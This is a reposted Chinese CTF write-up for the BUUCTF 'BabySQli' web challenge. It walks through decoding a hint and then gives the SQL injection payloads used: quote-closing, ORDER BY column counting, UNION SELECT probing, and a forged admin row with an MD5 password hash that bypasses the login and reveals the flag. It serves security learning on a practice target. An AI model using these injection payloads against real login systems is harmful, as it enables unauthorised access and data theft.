C/C++教程

BUUCTF - Web - BabySQli

本文主要是介绍BUUCTF - Web - BabySQli,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

BabySQli

拿到一个登录框


随便填些信息登录一下


这里用户名不是admin的话会提示用户名错误,其他都提示密码错误,看来admin就是正确用户名
可以看到返回页面有注释MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5
这串字符不区分大小写,只有[A-z2-7],看来是base32


这很显然是base64


解码出来了一段sql语句:select * from user where username = '$name'
可以看到查询语句中的$name被单引号闭合了,尝试用单引号闭合name=admin' or 1=1 -- qwe&pw=123

查字段:name=admin' order by 2 -- qwe&pw=123

存在绕过,换大写试试:name=admin' ORDER BY 4 -- qwe&pw=123

最后查出来三个字段
判断用户名所在字段:name=1' UNION SELECT 'admin',2,3 -- qwe&pw=asd


no user,把用户名放到第二位查询:name=1' UNION SELECT 1,'admin',3 -- qwe&pw=asd


看来用户名被存在第二个字段,无法查出数据,可能后端是利用两个if语句来验证用户名密码的

构造payload

我们不知道admin的密码,这时可以随便写,当联合查询不存在的数据时,只要字段一致,数据库会将该数据与原数据合起来输出


我们可以看到,数据库不光显示了我联合查询的数据,也显示了使where成立的数据
一般密码是使用哈希算法计算后存储在数据库中的,那么我们也可以将asd进行哈希加密(asd是随便写的)

先试试MD5:7815696ecbf1c96e6894b779456d330e
这里的第三位要与后面密码位保持一致:name=1' UNION SELECT 1,'admin','7815696ecbf1c96e6894b779456d330e' -- qwe&pw=asd


得到:flag{b13f4d63-8b0e-47ef-aee6-a6c31fe6f091}

总结

这道题可能也不是很难,但确实有爽到我
又一次体会到了拿到flag的乐趣!

这篇关于BUUCTF - Web - BabySQli的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!